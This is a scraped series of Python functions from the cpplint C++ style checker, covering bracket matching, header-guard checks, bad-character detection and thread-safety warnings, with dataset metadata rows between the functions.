# like "0.'3" (gcc 4.9.0 will not allow this literal).
if Search(r'\b(?:0[bBxX]?|[1-9])[0-9a-fA-F]*$', head):
match_literal = Match(r'^((?:\'?[0-9a-zA-Z_])*)(.*)$', "'" + tail)
collapsed += head + match_literal.group(1).replace("'", '')
elided = match_literal.group(2)
else:
second_quote = tail.find('\'')
if second_quote >= 0:
collapsed += head + "''"
elided = tail[second_quote + 1:]
else:
# Unmatched single quote
collapsed += elided
break
return collapsed | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def CloseExpression(clean_lines, linenum, pos):
"""If input points to ( or { or [ or <, finds the position that closes it.
If lines[linenum][pos] points to a '(' or '{' or '[' or '<', finds the
linenum/pos that correspond to the closing of the expression.
TODO(unknown): cpplint spends a fair bit of time matching parentheses.
Ideally we would want to index all opening and closing parentheses once
and have CloseExpression be just a simple lookup, but due to preprocessor
tricks, this is not so easy.
Args:
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
pos: A position on the line.
Returns:
A tuple (line, linenum, pos) pointer *past* the closing brace, or
(line, len(lines), -1) if we never find a close. Note we ignore
strings and comments when matching; and the line we return is the
'cleansed' line at linenum.
"""
line = clean_lines.elided[linenum]
if (line[pos] not in '({[<') or Match(r'<[<=]', line[pos:]):
return (line, clean_lines.NumLines(), -1)
# Check first line
(end_pos, stack) = FindEndOfExpressionInLine(line, pos, [])
if end_pos > -1:
return (line, linenum, end_pos)
# Continue scanning forward
while stack and linenum < clean_lines.NumLines() - 1:
linenum += 1
line = clean_lines.elided[linenum]
(end_pos, stack) = FindEndOfExpressionInLine(line, 0, stack)
if end_pos > -1:
return (line, linenum, end_pos)
# Did not find end of expression before end of file, give up
return (line, clean_lines.NumLines(), -1) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def ReverseCloseExpression(clean_lines, linenum, pos):
"""If input points to ) or } or ] or >, finds the position that opens it.
If lines[linenum][pos] points to a ')' or '}' or ']' or '>', finds the
linenum/pos that correspond to the opening of the expression.
Args:
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
pos: A position on the line.
Returns:
A tuple (line, linenum, pos) pointer *at* the opening brace, or
(line, 0, -1) if we never find the matching opening brace. Note
we ignore strings and comments when matching; and the line we
return is the 'cleansed' line at linenum.
"""
line = clean_lines.elided[linenum]
if line[pos] not in ')}]>':
return (line, 0, -1)
# Check last line
(start_pos, stack) = FindStartOfExpressionInLine(line, pos, [])
if start_pos > -1:
return (line, linenum, start_pos)
# Continue scanning backward
while stack and linenum > 0:
linenum -= 1
line = clean_lines.elided[linenum]
(start_pos, stack) = FindStartOfExpressionInLine(line, len(line) - 1, stack)
if start_pos > -1:
return (line, linenum, start_pos)
# Did not find start of expression before beginning of file, give up
return (line, 0, -1) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def GetIndentLevel(line):
"""Return the number of leading spaces in line.
Args:
line: A string to check.
Returns:
An integer count of leading spaces, possibly zero.
"""
indent = Match(r'^( *)\S', line)
if indent:
return len(indent.group(1))
else:
return 0 | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def CheckForHeaderGuard(filename, clean_lines, error):
"""Checks that the file contains a header guard.
Logs an error if no #ifndef header guard is present. For other
headers, checks that the full pathname is used.
Args:
filename: The name of the C++ header file.
clean_lines: A CleansedLines instance containing the file.
error: The function to call with any errors found.
"""
# Don't check for header guards if there are error suppression
# comments somewhere in this file.
#
# Because this is silencing a warning for a nonexistent line, we
# only support the very specific NOLINT(build/header_guard) syntax,
# and not the general NOLINT or NOLINT(*) syntax.
raw_lines = clean_lines.lines_without_raw_strings
for i in raw_lines:
if Search(r'//\s*NOLINT\(build/header_guard\)', i):
return
cppvar = GetHeaderGuardCPPVariable(filename)
ifndef = ''
ifndef_linenum = 0
define = ''
endif = ''
endif_linenum = 0
for linenum, line in enumerate(raw_lines):
linesplit = line.split()
if len(linesplit) >= 2:
# find the first occurrence of #ifndef and #define, save arg
if not ifndef and linesplit[0] == '#ifndef':
# set ifndef to the header guard presented on the #ifndef line.
ifndef = linesplit[1]
ifndef_linenum = linenum
if not define and linesplit[0] == '#define':
define = linesplit[1]
# find the last occurrence of #endif, save entire line
if line.startswith('#endif'):
endif = line
endif_linenum = linenum
if not ifndef or not define or ifndef != define:
error(filename, 0, 'build/header_guard', 5,
'No #ifndef header guard found, suggested CPP variable is: %s' %
cppvar)
return
# The guard should be PATH_FILE_H_, but we also allow PATH_FILE_H__
# for backward compatibility.
if ifndef != cppvar:
error_level = 0
if ifndef != cppvar + '_':
error_level = 5
ParseNolintSuppressions(filename, raw_lines[ifndef_linenum], ifndef_linenum,
error)
error(filename, ifndef_linenum, 'build/header_guard', error_level,
'#ifndef header guard has wrong style, please use: %s' % cppvar)
# Check for "//" comments on endif line.
ParseNolintSuppressions(filename, raw_lines[endif_linenum], endif_linenum,
error)
match = Match(r'#endif\s*//\s*' + cppvar + r'(_)?\b', endif)
if match:
if match.group(1) == '_':
# Issue low severity warning for deprecated double trailing underscore
error(filename, endif_linenum, 'build/header_guard', 0,
'#endif line should be "#endif // %s"' % cppvar)
return
# Didn't find the corresponding "//" comment. If this file does not
# contain any "//" comments at all, it could be that the compiler
# only wants "/**/" comments, look for those instead.
no_single_line_comments = True
for i in xrange(1, len(raw_lines) - 1):
line = raw_lines[i]
if Match(r'^(?:(?:\'(?:\.|[^\'])*\')|(?:"(?:\.|[^"])*")|[^\'"])*//', line):
no_single_line_comments = False
break
if no_single_line_comments:
match = Match(r'#endif\s*/\*\s*' + cppvar + r'(_)?\s*\*/', endif)
if match:
if match.group(1) == '_':
# Low severity warning for double trailing underscore
error(filename, endif_linenum, 'build/header_guard', 0,
'#endif line should be "#endif /* %s */"' % cppvar)
return
# Didn't find anything
error(filename, endif_linenum, 'build/header_guard', 5,
'#endif line should be "#endif // %s"' % cppvar) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def CheckForBadCharacters(filename, lines, error):
"""Logs an error for each line containing bad characters.
Two kinds of bad characters:
1. Unicode replacement characters: These indicate that either the file
contained invalid UTF-8 (likely) or Unicode replacement characters (which
it shouldn't). Note that it's possible for this to throw off line
numbering if the invalid UTF-8 occurred adjacent to a newline.
2. NUL bytes. These are problematic for some tools.
Args:
filename: The name of the current file.
lines: An array of strings, each representing a line of the file.
error: The function to call with any errors found.
"""
for linenum, line in enumerate(lines):
if u'\ufffd' in line:
error(filename, linenum, 'readability/utf8', 5,
'Line contains invalid UTF-8 (or Unicode replacement character).')
if '\0' in line:
error(filename, linenum, 'readability/nul', 5, 'Line contains NUL byte.') | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def CheckForMultilineCommentsAndStrings(filename, clean_lines, linenum, error):
"""Logs an error if we see /* ... */ or "..." that extend past one line.
/* ... */ comments are legit inside macros, for one line.
Otherwise, we prefer // comments, so it's ok to warn about the
other. Likewise, it's ok for strings to extend across multiple
lines, as long as a line continuation character (backslash)
terminates each line. Although not currently prohibited by the C++
style guide, it's ugly and unnecessary. We don't do well with either
in this lint program, so we warn about both.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
# Remove all \\ (escaped backslashes) from the line. They are OK, and the
# second (escaped) slash may trigger later \" detection erroneously.
line = line.replace('\\\\', '')
if line.count('/*') > line.count('*/'):
error(filename, linenum, 'readability/multiline_comment', 5,
'Complex multi-line /*...*/-style comment found. '
'Lint may give bogus warnings. '
'Consider replacing these with //-style comments, '
'with #if 0...#endif, '
'or with more clearly structured multi-line comments.')
if (line.count('"') - line.count('\\"')) % 2:
error(filename, linenum, 'readability/multiline_string', 5,
'Multi-line string ("...") found. This lint script doesn\'t '
'do well with such strings, and may give bogus warnings. '
'Use C++11 raw strings or concatenation instead.') | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def CheckPosixThreading(filename, clean_lines, linenum, error):
"""Checks for calls to thread-unsafe functions.
Much code has been originally written without consideration of
multi-threading. Also, engineers are relying on their old experience;
they have learned posix before threading extensions were added. These
tests guide the engineers to use thread-safe functions (when using
posix directly).
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
for single_thread_func, multithread_safe_func, pattern in _THREADING_LIST:
# Additional pattern matching check to confirm that this is the
# function we are looking for
if Search(pattern, line):
error(filename, linenum, 'runtime/threadsafe_fn', 2,
'Consider using ' + multithread_safe_func +
'...) instead of ' + single_thread_func +
'...) for improved thread safety.') | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def CheckInvalidIncrement(filename, clean_lines, linenum, error):
"""Checks for invalid increment *count++.
For example following function:
void increment_counter(int* count) {
*count++;
}
is invalid, because it effectively does count++, moving pointer, and should
be replaced with ++*count, (*count)++ or *count += 1.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
if _RE_PATTERN_INVALID_INCREMENT.match(line):
error(filename, linenum, 'runtime/invalid_increment', 5,
'Changing pointer instead of value (or unused value of operator*).') | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def IsForwardClassDeclaration(clean_lines, linenum):
return Match(r'^\s*(\btemplate\b)*.*class\s+\w+;\s*$', clean_lines[linenum]) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def __init__(self, seen_open_brace):
self.seen_open_brace = seen_open_brace
self.open_parentheses = 0
self.inline_asm = _NO_ASM
self.check_namespace_indentation = False | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def CheckEnd(self, filename, clean_lines, linenum, error):
"""Run checks that applies to text after the closing brace.
This is mostly used for checking end of namespace comments.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
pass | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def __init__(self):
_BlockInfo.__init__(self, True) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
Subsets and Splits